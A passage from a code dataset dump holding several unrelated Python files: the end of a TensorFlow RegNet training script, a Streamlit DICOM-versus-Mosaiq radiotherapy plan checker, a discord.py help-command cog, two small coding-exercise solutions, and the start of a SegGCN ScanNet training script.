tf.layers.conv3d(conv1MLow, 16 , 3, padding=\"valid\", activation=None, name='conv'+str(i)+'MLow')\n conv1MLow = tf.layers.batch_normalization(conv1MLow, training=bn_training)\n conv1MLow = tf.nn.relu(conv1MLow)\n\n conv2 = tf.concat([conv1F, conv1M], 4)\n conv2Low = tf.concat([conv1FLow, conv1MLow], 4)\n\n numberOfFeatures = [25,25,25,30,30,30]\n for i in range (4,10):\n conv2Low = tf.layers.conv3d(conv2Low, numberOfFeatures[i-4] , 3, padding=\"valid\", activation=None, name='conv'+str(i)+'Low')\n conv2Low = tf.layers.batch_normalization(conv2Low, training=bn_training)\n conv2Low = tf.nn.relu(conv2Low)\n\n numberOfFeatures = [25,30]\n for i in range(4, 6):\n conv2 = tf.layers.conv3d(conv2, numberOfFeatures[i-4] , 3, padding=\"valid\", activation=None, name='conv'+str(i))\n conv2 = tf.layers.batch_normalization(conv2, training=bn_training)\n conv2 = tf.nn.relu(conv2)\n\n conv2 = tf.layers.max_pooling3d(conv2 , 2, 2, name='conv6')\n\n conv3 = tf.concat([conv2, conv2Low], 4)\n\n numberOfFeatures = [60, 70, 75, 150]\n for i in range(1, 5):\n conv3 = tf.layers.conv3d(conv3, numberOfFeatures[i-1] , 3, padding=\"valid\", activation=None, name='convFullyConnected'+str(i))\n conv3 = tf.layers.batch_normalization(conv3, training=bn_training)\n conv3 = tf.nn.relu(conv3)\n\n conv4 = tf.layers.conv3d(conv3, numberOfFeatures[i-1] , 1, padding=\"valid\", activation=None, name='convFullyConnected'+str(5))\n conv4 = tf.layers.batch_normalization(conv4, training=bn_training)\n conv4 = tf.nn.relu(conv4)\n\n yHat = tf.layers.conv3d(conv4, 3, 1, padding=\"valid\", activation=None)\n mse = (tf.losses.huber_loss(y, yHat, weights=1))\n\n extra_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n with tf.control_dependencies(extra_update_ops):\n train_step = tf.train.AdamOptimizer(learning_rate).minimize(mse)\n\n print('mse shape %s ' % (mse.get_shape()))\n print('y shape %s ' % (y.get_shape()))\n tf.summary.scalar(\"mse\", mseTrainAverage_net)\n\n summ = tf.summary.merge_all()\n train_writer = tf.summary.FileWriter(LOGDIR + '/train'+Exp, sess.graph)\n test_writer = tf.summary.FileWriter(LOGDIR + '/test' + Exp, sess.graph)\n # 
tf.global_variables_initializer().run() #Otherwise you encounter this error : Attempting to use uninitialized value conv2d/kerne\n print(' total numbe of variables %s' %(np.sum([np.prod(v.get_shape().as_list()) for v in tf.trainable_variables()])))\n sess.run(tf.global_variables_initializer())\n\n saver = tf.train.Saver()\n\n # %%------------------------------------------- Setting of generating synthetic DVFs------------------------------------------\n Setting = {}\n Setting['DLFolder'] = '/srv/2-lkeb-16-reg1/hsokooti/DL/' # 'E:/PHD/Software/Project/DL/' or '/srv/2-lkeb-16-reg1/hsokooti/DL/'\n Setting['deformName'] = 'LungExp3D_2Teeeesssst' # 2D: 'LungExp2D_1' , 3D: 'LungExp3D_2'\n Setting['Dim'] = '3D' # '2D' or '3D'. Please note that in 2D setting, we still have a 3D DVF with zero values for the third direction\n Setting['DistanceDeform'] = 40 # The minimum distance between two random peaks\n Setting['DistanceArea'] = 20 # The area that is inculeded in the training algorithm\n Setting['sigmaNL'] = 1 # For adding noise for the next fixed image. This noise should be small otherwise we would ruin the SNR.\n Setting['Border'] = 33 # No peak would be in range of [0,Border) and [ImSize-Border, ImSize)\n Setting['sigmaN'] = 5 # Sigma for adding noise after deformation\n Setting['MaxDeform'] = [20, 15, 15] # The maximum amplitude of deformations\n Setting['sigmaB'] = [35, 25, 20] # For blurring deformaion peak\n Setting['Np'] = [100, 100, 100] # Number of random peaks\n\n # %%------------------------------------------------ Setting of reading DVFs ------------------------------------------------\n Setting['Resolution'] = 'multi' # 'single' or 'multi' resolution. In multiresolution, the downsampled patch is involved.\n Setting['deformMethod'] = [0, 1, 2] # 0: low freq, 1: medium freq, 2: high freq.\n Setting['classBalanced'] = [1.5, 4, 8] # Use these threshold values to balance the number of data in each category. for instance [a,b] implies classes [0,a), [a,b). Numbers are in mm\n Setting['K'] = 65 # Margin from the border to select random patches\n Setting['ParallelSearch'] = True # Using np.where in parallel with [number of cores - 2] in order to make balanced data. This is done with joblib library\n Setting['R'] = 14 # Radius of normal resolution patch size. Total size is (2*R +1)\n Setting['Rlow'] = 26 # Radius of low resolution patch size. Total size is (Rlow +1). Selected patch size: center-Rlow : center+Rlow : 2\n Setting['Ry'] = 0 # Radius of output. 
Total size is (2*Ry +1)\n Setting['verbose'] = True # Detailed printing\n\n # training\n INTrain = np.arange(1, 11) # Patients in the training set including fixed and moving images and several synthetic deformations of them\n numberOfImagesPerChunk = 5 # Number of images that I would like to load in RAM\n samplesPerImage = 10000\n batchSizeTrain = 50\n\n # validation\n INValidation = np.arange(11, 13) # Patients in the validation set including fixed and moving images and several synthetic deformations of them\n numberOfImagesPerChunkVal = 6 # Number of images that I would like to load in RAM\n samplesPerImageVal = 3000\n batchSizeVal = 500\n\n RegNetVal = RegNet.Patches(setting=Setting, numberOfImagesPerChunk=numberOfImagesPerChunkVal, samplesPerImage=samplesPerImageVal, IN=INValidation, training=0)\n RegNetVal.fillList()\n RegNetTrainThread = RegNetThread.PatchesThread(setting=Setting, numberOfImagesPerChunk=numberOfImagesPerChunk, samplesPerImage=samplesPerImage, IN=INTrain, training=1)\n RegNetTrainThread.start()\n while (not RegNetTrainThread._filled):\n time.sleep(2)\n RegNetTrain = RegNet.Patches(setting=Setting, numberOfImagesPerChunk=numberOfImagesPerChunk, samplesPerImage=samplesPerImage, IN=INTrain, training=1)\n RegNetTrain.copyFromThread(RegNetTrainThread)\n chunks_completed = False\n RegNetTrainThread._filled = 0\n ThreadIsFilling = False\n mseTrainAverage = 0\n count = 1\n\n for itr in range(0,max_steps):\n if RegNetTrainThread._filled:\n ThreadIsFilling = False\n if (chunks_completed):\n if not RegNetTrainThread._filled:\n print ('Training the network is faster than reading the data ..... please wait .....')\n while (not RegNetTrainThread._filled):\n time.sleep(2)\n else:\n print('Training the network is slower than reading the data :-) ')\n RegNetTrain = RegNet.Patches(setting=Setting, numberOfImagesPerChunk=numberOfImagesPerChunk, samplesPerImage=samplesPerImage, IN=INTrain, training=1)\n RegNetTrain.copyFromThread(RegNetTrainThread)\n RegNetTrainThread._filled = 0\n chunks_completed = False\n ThreadIsFilling = False\n\n if (not RegNetTrainThread._filled) and (not ThreadIsFilling):\n RegNetTrainThread.goToNextChunk()\n RegNetTrainThread.resume()\n ThreadIsFilling = True\n\n batchX, batchY , batchXLow= RegNetTrain.next_batch(batchSizeTrain)\n if RegNetTrain._chunks_completed:\n print('chunk is completed')\n chunks_completed = True\n batchX = (batchX + 1000) / 4095.\n batchXLow = (batchXLow + 1000) / 4095.\n [mseTrainSample, _] = sess.run([mse,train_step], feed_dict={x: batchX, y: batchY, xLow: batchXLow, bn_training: 1, mseTrainAverage_net : mseTrainAverage})\n mseTrainAverage = mseTrainAverage + mseTrainSample\n count = count + 1\n if itr % 25 == 1:\n mseTrainAverage = mseTrainAverage/count\n [train_mse, s, y_dirX_temp, yHat_dirX_temp] = sess.run([mse, summ, y, yHat], feed_dict={x: batchX, y: batchY, xLow: batchXLow, bn_training: 0 , mseTrainAverage_net : mseTrainAverage})\n train_writer.add_summary(s, itr*batchSizeTrain)\n print('Train MSE at Epoch %s itr %s : %s time%s' % (RegNetTrain._semiEpoch, itr, mseTrainAverage, 2))\n mseTrainAverage = 0 ; count = 1\n if itr % 200 == 1:\n hi = 1\n # plt.figure(figsize=(22, 12))\n # y_dirX_temp = y_dirX_temp.flatten()\n # yHat_dirX_temp = yHat_dirX_temp.flatten()\n # sort_indices = np.argsort(y_dirX_temp)\n # plt.plot(y_dirX_temp[sort_indices], label='out train dir' + str(itr*batchSizeTrain))\n # plt.plot(yHat_dirX_temp[sort_indices], label='targets dir' + str(itr*batchSizeTrain))\n # plt.legend(bbox_to_anchor=(1., .8))\n # 
plt.ylim((-15, 15))\n # plt.draw()\n # plt.savefig(LOGDIR + 'train' + Exp + '/Model/' + 'y_train_dir' + str(itr*batchSizeTrain) + '_epoch.png')\n # plt.close()\n\n RegNetVal.resetValidation()\n mseValAverage = 0\n countVal = 1\n if itr % 1000 == 1:\n while not RegNetVal._chunks_completed:\n batchXTest, batchYTest , batchXLowTest = RegNetVal.next_batch(batchSizeVal)\n batchXTest = (batchXTest + 1000) / 4095.\n batchXLowTest = (batchXLowTest + 1000) / 4095.\n [mseValSample, s, y_dirX_temp, yHat_dirX_temp] = sess.run([mse, summ, y, yHat], feed_dict={x: batchXTest, y: batchYTest, xLow: batchXLowTest, bn_training: 0, mseTrainAverage_net : mseValAverage})\n mseValAverage = mseValAverage + mseValSample\n countVal = countVal + 1\n mseValAverage = mseValAverage / countVal\n [s] = sess.run([ summ], feed_dict={ x: batchXTest, y: batchYTest, xLow: batchXLowTest, bn_training: 1, mseTrainAverage_net : mseValAverage})\n test_writer.add_summary(s, itr*batchSizeTrain)\n\n\ndef main():\n learning_rate = 1E-3\n max_steps = np.array(1E7).astype(np.int64)\n RegNet_model(learning_rate = learning_rate , max_steps = max_steps)\n\n\n\nif __name__ == '__main__':\n main()","sub_path":"submodules/RegNet/RegNet3D_MICCAI.py","file_name":"RegNet3D_MICCAI.py","file_ext":"py","file_size_in_byte":13886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"142038111","text":"import os\n\nimport streamlit as st\n\nfrom compare import color_results, compare_to_mosaiq\nfrom helpers import get_all_dicom_treatment_info\nfrom pymedphys._mosaiq import connect\nfrom pymedphys._mosaiq.helpers import get_all_treatment_data, get_staff_initials\nfrom tolerance_constants import SITE_CONSTANTS, TOLERANCE_TYPES\n\n\ncurrdir = os.getcwd()\nserver = \"PRDMOSAIQIWVV01.utmsa.local\"\n\nst.title(\"Data Transfer Check\")\nst.sidebar.header(\"Instructions:\")\nst.sidebar.markdown(\n \"\"\"\nTo use this application, you must have the RP file of the plan you want to check. This can be exported in Pinnacle.\nYou will get an error if you select a QA RP file.\n\nWhen exporting the DICOM, only the RP is needed. 
Once you have that, you can select it where prompted and the application\nwill run.\n\"\"\"\n)\ndicomFile = st.file_uploader(\"Please select a RP file.\", force=True)\n\nif dicomFile is not None:\n # retrieve data from both systems.\n dicom_table = get_all_dicom_treatment_info(dicomFile)\n dicom_table[\"tolerance\"] = [\n TOLERANCE_TYPES[item] for item in dicom_table[\"tolerance\"]\n ]\n dicom_table = dicom_table.sort_values([\"field_label\"])\n\n mrn = dicom_table.iloc[0][\"mrn\"]\n with connect.connect(server) as connection:\n mosaiq_table = get_all_treatment_data(connection, mrn)\n if mosaiq_table.iloc[0][\"create_id\"] is not None:\n try:\n site_initials = get_staff_initials(\n connection, str(mosaiq_table.iloc[0][\"create_id\"])\n )\n except:\n site_initials = \"\"\n\n # mosaiq_table = mosaiq_table[mosaiq_table[\"field_version\"] == 0]\n mosaiq_table = mosaiq_table[\n (mosaiq_table[\"site_version\"] == 0)\n & (mosaiq_table[\"site_setup_version\"] == 0)\n & (mosaiq_table[\"field_version\"] == 0)\n ]\n mosaiq_table = mosaiq_table.reset_index(drop=True)\n mosaiq_table[\"tolerance\"] = [\n TOLERANCE_TYPES[item] for item in mosaiq_table[\"tolerance\"]\n ]\n ########################################################################################################################\n # verify general patient information between the two systems\n name = dicom_table.iloc[0][\"first_name\"] + \" \" + dicom_table.iloc[0][\"last_name\"]\n st.subheader(\"Patient:\")\n\n if (\n name\n == mosaiq_table.iloc[0][\"first_name\"] + \" \" + mosaiq_table.iloc[0][\"last_name\"]\n ):\n st.success(\"Name: \" + name)\n else:\n st.error(\"Name: \" + name)\n\n if mrn == mosaiq_table.iloc[0][\"mrn\"]:\n st.success(\"MRN: \" + mrn)\n else:\n st.error(\"MRN: \" + mrn)\n\n DOB = str(mosaiq_table.iloc[0][\"dob\"])[0:10]\n dicom_DOB = dicom_table.iloc[0][\"dob\"]\n if DOB == dicom_DOB[0:4] + \"-\" + dicom_DOB[4:6] + \"-\" + dicom_DOB[6:8]:\n st.success(\"DOB: \" + DOB)\n else:\n st.error(\"DOB: \" + DOB)\n\n ########################################################################################################################\n # check the approval status of various sections in Mosaiq\n st.subheader(\"Approval Status:\")\n\n # check site setup approval\n if all(i == 5 for i in mosaiq_table.iloc[:][\"site_setup_status\"]):\n st.success(\"Site Setup Approved\")\n else:\n for i in mosaiq_table.iloc[:][\"site_setup_status\"]:\n if i != 5:\n st.error(\"Site Setup \" + SITE_CONSTANTS[i])\n break\n\n # check site approval\n if all(i == 5 for i in mosaiq_table.iloc[:][\"site_status\"]):\n st.success(\"RX Approved by \" + str(site_initials[0][0]))\n else:\n st.error(\"RX Approval Pending\")\n ########################################################################################################################\n # create a list of all the fields in the DICOM RP file\n index = []\n for j in dicom_table.iloc[:][\"field_label\"]:\n for i in range(len(mosaiq_table)):\n if mosaiq_table.iloc[i][\"field_label\"] == j:\n index.append(i)\n # remove any fields in Mosaiq that are not being compared to this particular RP file\n remove = []\n for i in mosaiq_table.iloc[:].index:\n if i not in index:\n remove.append(i)\n\n mosaiq_table = mosaiq_table.drop(remove)\n mosaiq_table = mosaiq_table.sort_index(axis=1)\n mosaiq_table = mosaiq_table.sort_values(by=[\"field_label\"])\n\n # compare values between the two systems and create a new dataframe with the results\n results = compare_to_mosaiq(dicom_table, mosaiq_table)\n results = 
results.transpose()\n\n # create a dropdown menu of prescriptions in mosaiq to choose from\n rx_selection = st.radio(\"Select RX: \", mosaiq_table.site.unique())\n rx_fields = mosaiq_table[mosaiq_table[\"site\"] == rx_selection][\"field_name\"].values\n\n # create a drop down menu to select fields to compare, only fields within selected rx appear as choices\n field_selection = st.radio(\"Select field to compare:\", rx_fields)\n st.subheader(\"Comparison\")\n\n if len(field_selection) is not 0:\n dicom_field = str(field_selection) + \"_DICOM\"\n mosaiq_field = str(field_selection) + \"_MOSAIQ\"\n st.write(\"**RX**: \", results[field_selection + \"_DICOM\"][\"rx\"])\n\n try:\n field_approval_id = mosaiq_table[\n mosaiq_table[\"field_name\"] == field_selection\n ][\"field_approval\"]\n with connect.connect(server) as connection:\n field_approval_initials = get_staff_initials(\n connection, str(int(field_approval_id.iloc[0]))\n )\n st.write(\"**Field Approved by: **\", field_approval_initials[0][0])\n except:\n st.write(\"This field is not approved.\")\n\n display_results = results[[dicom_field, mosaiq_field]]\n display_results = display_results.drop(\n [\"dob\", \"first_name\", \"last_name\", \"mrn\"], axis=0\n )\n display_results = display_results.style.apply(color_results, axis=1)\n st.dataframe(display_results, height=1000)\n\n fx_pattern = mosaiq_table[mosaiq_table[\"field_name\"] == field_selection][\n \"fraction_pattern\"\n ]\n st.write(\"**FX Pattern**: \", fx_pattern.iloc[0])\n\n comments = mosaiq_table[mosaiq_table[\"field_name\"] == field_selection][\"notes\"]\n st.write(\"**Comments**: \", comments.iloc[0])\n\n show_dicom = st.checkbox(\"View complete DICOM table.\")\n if show_dicom:\n st.subheader(\"DICOM Table\")\n st.dataframe(dicom_table, height=1000)\n\n show_mosaiq = st.checkbox(\"View complete Mosaiq table.\")\n if show_mosaiq:\n st.subheader(\"Mosaiq Table\")\n st.dataframe(mosaiq_table, height=1000)\n","sub_path":"site-specific/mays/streamlit_check.py","file_name":"streamlit_check.py","file_ext":"py","file_size_in_byte":6633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"220020787","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nThe MIT License (MIT)\nCopyright (c) 2018-2019 laggycomputer\nPermission is hereby granted, free of charge, to any person obtaining a\ncopy of this software and associated documentation files (the \"Software\"),\nto deal in the Software without restriction, including without limitation\nthe rights to use, copy, modify, merge, publish, distribute, sublicense,\nand/or sell copies of the Software, and to permit persons to whom the\nSoftware is furnished to do so, subject to the following conditions:\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS\nOR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\nFROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER\nDEALINGS IN THE SOFTWARE.\n\"\"\"\n\nimport discord\nfrom discord.ext import commands\n\nfrom .utils import Embedinator\n\n\nclass HelpCommand(commands.HelpCommand):\n def __init__(self):\n super().__init__()\n self.color = 0xf92f2f\n\n def command_not_found(self, string):\n return f\"Command or category `{self.context.prefix}{string}` not found. Try again...\"\n\n def subcommand_not_found(self, command, string):\n if isinstance(command, commands.Group) and len(command.all_commands) > 0:\n return f\"Command `{self.context.prefix}{command.qualified_name}` has no subcommand named {string}\"\n else:\n return f\"Command `{self.context.prefix}{command.qualified_name}` has no subcommands.\"\n\n @staticmethod\n def get_command_name(command):\n name = command.name\n if any(command.aliases):\n alist = []\n for alias in command.aliases:\n alist.append(\"`%s`\" % alias)\n name = f\"{name}, {', '.join(alist)}\"\n\n name = f\"{name} {command.signature}\"\n return name\n\n def create_embed(self):\n embed = discord.Embed(colour=self.color)\n embed.set_author(\n name=self.context.bot.user.name,\n icon_url=self.context.bot.user.avatar_url\n )\n embed.set_thumbnail(url=self.context.bot.user.avatar_url)\n embed.set_footer(\n text=f\"{self.context.bot.description} Requested by {self.context.author}\",\n icon_url=self.context.author.avatar_url\n )\n\n return embed\n\n def create_embedinator(self, **kwargs):\n destination = self.get_destination()\n embedinator = Embedinator(\n self.context.bot,\n destination,\n self.context.author,\n color=self.color,\n **kwargs\n )\n\n embedinator.set_author(\n name=self.context.bot.user.name,\n icon_url=self.context.bot.user.avatar_url\n )\n embedinator.set_thumbnail(url=self.context.bot.user.avatar_url)\n embedinator.base_embed.set_footer(\n text=f\"{self.context.bot.description} Requested by {self.context.author}\",\n icon_url=self.context.author.avatar_url\n )\n\n return embedinator\n\n async def send_command_help(self, command):\n embed = self.create_embed()\n embed.title = self.get_command_name(command)\n embed.description = command.short_doc or \"No description\"\n embed.set_footer(text=f\"Category: {command.cog_name}\")\n\n destination = self.get_destination()\n sent = (await destination.send(embed=embed))\n await self.context.bot.register_response(sent, self.context.message)\n\n async def send_group_help(self, group):\n embedinator = self.create_embedinator(\n title=self.get_commands(group),\n description=group.short_doc or \"No description\",\n max_fields=4\n )\n\n filtered = await self.filter_commands(group.commands)\n\n if filtered:\n for command in filtered:\n self.add_command_field(embedinator, command)\n\n sent = (await embedinator.send())\n await self.context.bot.register_response(sent, self.context.message)\n\n await embedinator.handle()\n\n async def send_cog_help(self, cog):\n embedinator = self.create_embedinator(\n title=cog.qualified_name,\n description=cog.description or \"No description\",\n max_fields=4\n )\n\n filtered = await self.filter_commands(cog.get_commands())\n\n if filtered:\n for command in filtered:\n self.add_command_field(embedinator, command)\n\n sent = (await embedinator.send())\n await self.context.bot.register_response(sent, self.context.message)\n\n await embedinator.handle()\n\n async def 
send_bot_help(self, mapping):\n embedinator = self.create_embedinator(\n title=\"General help\",\n description=self.get_opening_note(),\n max_fields=4\n )\n\n for cog, cog_commands in mapping.items():\n for command in cog_commands:\n self.add_command_field(embedinator, command)\n\n sent = (await embedinator.send())\n await self.context.bot.register_response(sent, self.context.message)\n\n await embedinator.handle()\n\n def add_command_field(self, embedinator, command):\n name = self.get_command_name(command)\n embedinator.add_field(name=name, value=command.short_doc, inline=False)\n\n def get_opening_note(self):\n command_name = self.context.invoked_with\n return f\"Use `{self.context.prefix}{command_name} ` or `{self.context.prefix}{command_name}\"\\\n \" ` for more info on a command or category.\"\n\n\nclass Help(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n self.original_help_command = bot.help_command\n bot.help_command = HelpCommand()\n bot.help_command.cog = self\n self.bot.get_command('help').hidden = True\n\n def cog_unload(self):\n self.bot.help_command = self.original_help_command\n\n\ndef setup(bot):\n bot.add_cog(Help(bot))\n","sub_path":"suprkewl-bot/ext/help.py","file_name":"help.py","file_ext":"py","file_size_in_byte":6275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"491977183","text":"class Solution:\n def oneEditAway(self, first: str, second: str) -> bool:\n fl, sl = len(first), len(second)\n if abs(fl - sl) >= 2:\n return False\n for i in range(min(fl, sl)):\n if first[i] == second[i]:\n continue\n else:\n return first[i:] == second[i+1:] or first[i+1:] == second[i:] or \\\n first[i+1:] == second[i+1:]\n return True\n","sub_path":"v6/01_05_oneEditAway.py","file_name":"01_05_oneEditAway.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"41876744","text":"class Solution(object):\n def matrixReshape(self, nums, r, c):\n \"\"\"\n :type nums: List[List[int]]\n :type r: int\n :type c: int\n :rtype: List[List[int]]\n \"\"\"\n array = []\n for x in nums:\n for y in x:\n array.append(y)\n result = []\n for x in range(r):\n result.append([])\n slot = 0\n for x in range(r):\n for y in range(c):\n if slot >= len(array):\n return nums\n result[x].append(array[slot])\n slot += 1\n return result","sub_path":"reshape-the-matrix/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"149519","text":"import argparse\nimport time\nfrom datetime import datetime\nimport numpy as np\nimport tensorflow as tf\nimport socket\nimport importlib\nimport os\nimport sys\n\nbaseDir = os.path.dirname(os.path.abspath(__file__))\nrootDir = os.path.dirname(baseDir)\nsys.path.append(baseDir)\nsys.path.append(os.path.join(rootDir, 'models'))\nsys.path.append(os.path.join(rootDir, 'utils'))\nimport data_util\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--gpu', type=int, default=0, help='GPU to use [default: GPU 0]')\nparser.add_argument('--model', default='SegGCN_scannet', help='Model name [default: SegGCN_scannet]')\nparser.add_argument('--config', default='scannet_config_SegGCN', help='Model name [default: scannet_config_SegGCN]')\nparser.add_argument('--log_dir', default='log_scannet', help='Log dir [default: log_scannet]')\nparser.add_argument('--load_ckpt', '-l', help='Path to a check point 
file for load')\nparser.add_argument('--max_epoch', type=int, default=501, help='Epoch to run [default: 501]')\nparser.add_argument('--batch_size', type=int, default=16, help='Batch Size during training [default: 16]')\nparser.add_argument('--learning_rate', type=float, default=0.001, help='Initial learning rate [default: 0.001]')\nparser.add_argument('--momentum', type=float, default=0.9, help='Initial learning rate [default: 0.9]')\nparser.add_argument('--optimizer', default='adam', help='adam or momentum [default: adam]')\nparser.add_argument('--decay_step', type=int, default=500000, help='Decay step for lr decay [default: 1000000]')\nparser.add_argument('--decay_rate', type=float, default=0.7, help='Decay rate for lr decay [default: 0.7]')\nFLAGS = parser.parse_args()\n\nBATCH_SIZE = FLAGS.batch_size\nMAX_EPOCH = FLAGS.max_epoch\nBASE_LEARNING_RATE = FLAGS.learning_rate\nGPU_INDEX = FLAGS.gpu\nMOMENTUM = FLAGS.momentum\nOPTIMIZER = FLAGS.optimizer\nDECAY_STEP = FLAGS.decay_step\nDECAY_RATE = FLAGS.decay_rate\n\nMODEL = importlib.import_module(FLAGS.model) # import network module\nMODEL_FILE = os.path.join(rootDir, 'models', FLAGS.model+'.py')\nLOG_DIR = os.path.join(rootDir, FLAGS.log_dir)\nif not os.path.exists(LOG_DIR): os.mkdir(LOG_DIR)\nos.system('cp %s %s' % (MODEL_FILE, LOG_DIR)) # bkp of model def\nos.system('cp train_scannet.py %s' % (LOG_DIR)) # bkp of train procedure\nos.system('cp %s.py %s' % (FLAGS.config, LOG_DIR)) # bkp of train procedure\nLOG_FOUT = open(os.path.join(LOG_DIR, 'log_train.txt'), 'a')\nLOG_FOUT.write(str(FLAGS)+'\\n')\n\nHOSTNAME = socket.gethostname()\n\nnet_config = importlib.import_module(FLAGS.config)\nNUM_POINT = net_config.num_input\nNUM_CLASSES = net_config.num_cls\nINPUT_DIM = 6\n\ndataDir = '/media/huanlei/Data/PycharmProjects/SPH3D-GCN/data/scannet-3cm'\ntrainlist = [line.rstrip() for line in open(os.path.join(dataDir, 'train_val_files.txt'))]\nvallist = [line.rstrip() for line in open(os.path.join(dataDir, 'val_files.txt'))]\n\n\nclasses = {'other20':0,'wall':1,'floor':2,'cabinet':3,'bed':4,'chair':5,\\\n 'sofa':6,'table':7,'door':8,'window':9,'bookshelf':10,\\\n 'picture':11,'counter':12,'desk':13,'curtain':14,'refridgerator':15,\\\n 'shower curtain':16,'toilet':17,'sink':18,'bathtub':19,'otherfurniture':20}\n\n\ndef log_string(out_str):\n LOG_FOUT.write(out_str+'\\n')\n LOG_FOUT.flush()\n print(out_str)\n\n\ndef get_learning_rate(batch):\n learning_rate = tf.train.exponential_decay(\n BASE_LEARNING_RATE, # Base learning rate.\n batch * BATCH_SIZE, # Current index into the dataset.\n DECAY_STEP, # Decay step.\n DECAY_RATE, # Decay rate.\n staircase=True)\n learning_rate = tf.maximum(learning_rate, 0.000001) # CLIP THE LEARNING RATE!\n return learning_rate\n\n\ndef placeholder_inputs(batch_size, num_point):\n input_pl = tf.placeholder(tf.float32, shape=(batch_size, num_point, INPUT_DIM))\n label_pl = tf.placeholder(tf.int32, shape=(batch_size, num_point))\n inner_label_pl = tf.placeholder(tf.int32, shape=(batch_size, num_point))\n\n return input_pl, label_pl, inner_label_pl\n\n\ndef augment_fn(batch_input, batch_label, batch_inner):\n bsize, num_point, _ = batch_input.shape\n\n # shuffle the orders of samples in a batch\n idx = np.arange(bsize)\n np.random.shuffle(idx)\n batch_input = batch_input[idx,:,:]\n batch_label = batch_label[idx,:]\n batch_inner = batch_inner[idx,:]\n\n # shuffle the point orders of each sample\n idx = np.arange(num_point)\n np.random.shuffle(idx)\n batch_input = batch_input[:,idx,:]\n batch_label = batch_label[:,idx]\n 
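    # editorial note: the permutation idx built just above is applied
    # identically to batch_input, batch_label and batch_inner, so inputs and
    # their per-point labels stay index-aligned after the shuffle.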
batch_inner = batch_inner[:,idx]\n\n # perform augmentation on the first np.int32(augment_ratio*bsize) samples\n augSize = np.int32(1/3.0 * bsize)\n augment_xyz = batch_input[0:augSize,:,0:3]\n augment_xyz = data_util.rotate_point_cloud(augment_xyz)\n augment_xyz = data_util.rotate_perturbation_point_cloud(augment_xyz)\n augment_xyz = data_util.random_scale_point_cloud(augment_xyz)\n augment_xyz = data_util.shift_point_cloud(augment_xyz)\n augment_xyz = data_util.jitter_point_cloud(augment_xyz)\n batch_input[0:augSize,:,0:3] = augment_xyz\n\n augment_xyz = batch_input[augSize:2*augSize,:,0:3]\n augment_xyz = data_util.rotate_perturbation_point_cloud(augment_xyz)\n augment_xyz = data_util.random_scale_point_cloud(augment_xyz)\n augment_xyz = data_util.shift_point_cloud(augment_xyz)\n augment_xyz = data_util.jitter_point_cloud(augment_xyz)\n batch_input[augSize:2*augSize,:,0:3] = augment_xyz\n\n return batch_input, batch_label, batch_inner\n\n\ndef parse_fn(item):\n features = tf.parse_single_example(\n item,\n features={\n 'xyz_raw': tf.FixedLenFeature([], dtype=tf.string),\n 'rgb_raw': tf.FixedLenFeature([], dtype=tf.string),\n 'seg_label':tf.FixedLenFeature([], dtype=tf.string),\n 'inner_label':tf.FixedLenFeature([], dtype=tf.string)})\n\n xyz = tf.decode_raw(features['xyz_raw'], tf.float32)\n rgb = tf.decode_raw(features['rgb_raw'], tf.float32)\n seg_label = tf.decode_raw(features['seg_label'], tf.int32)\n inner_label = tf.decode_raw(features['inner_label'], tf.int32)\n\n xyz = tf.reshape(xyz, [-1, 3])\n rgb = tf.reshape(rgb, [-1, 3])\n seg_label = tf.reshape(seg_label, [-1, 1])\n inner_label = tf.reshape(inner_label, [-1, 1])\n all_in_one = tf.concat((xyz, rgb, tf.cast(seg_label,tf.float32),\n tf.cast(inner_label,tf.float32)), axis=-1)\n\n return all_in_one\n\n\ndef input_fn(filelist, batch_size=16, buffer_size=10000):\n dataset = tf.data.TFRecordDataset(filelist)\n dataset = dataset.shuffle(buffer_size=buffer_size)\n dataset = dataset.map(parse_fn, num_parallel_calls=4)\n dataset = dataset.padded_batch(batch_size, padded_shapes=(None,INPUT_DIM+2),\n padding_values=-1.0, drop_remainder=False)\n\n return dataset\n\n\ndef train():\n # ===============================Prepare the Dataset===============================\n trainset = input_fn(trainlist, BATCH_SIZE, 10000)\n train_iterator = trainset.make_initializable_iterator()\n next_train_element = train_iterator.get_next()\n\n testset = input_fn(vallist, BATCH_SIZE, 10000)\n test_iterator = testset.make_initializable_iterator()\n next_test_element = test_iterator.get_next()\n # =====================================The End=====================================\n\n with tf.device('/gpu:0'):\n # =================================Define the Graph================================\n input_pl, label_pl, inner_label_pl = placeholder_inputs(BATCH_SIZE, NUM_POINT)\n\n training_pl = tf.placeholder(tf.bool, shape=())\n global_step = tf.Variable(0, trainable=False, name='global_step')\n\n # Get model and loss\n pred, end_points = MODEL.get_model(input_pl, training_pl, config=net_config)\n MODEL.get_loss(pred, label_pl, end_points, inner_label_pl)\n if net_config.weight_decay is not None:\n reg_loss = tf.multiply(tf.losses.get_regularization_loss(), net_config.weight_decay, name='reg_loss')\n tf.add_to_collection('losses', reg_loss)\n losses = tf.get_collection('losses')\n total_loss = tf.add_n(losses, name='total_loss')\n tf.summary.scalar('total_loss', total_loss)\n for l in losses + [total_loss]:\n tf.summary.scalar(l.op.name, l)\n\n correct = 
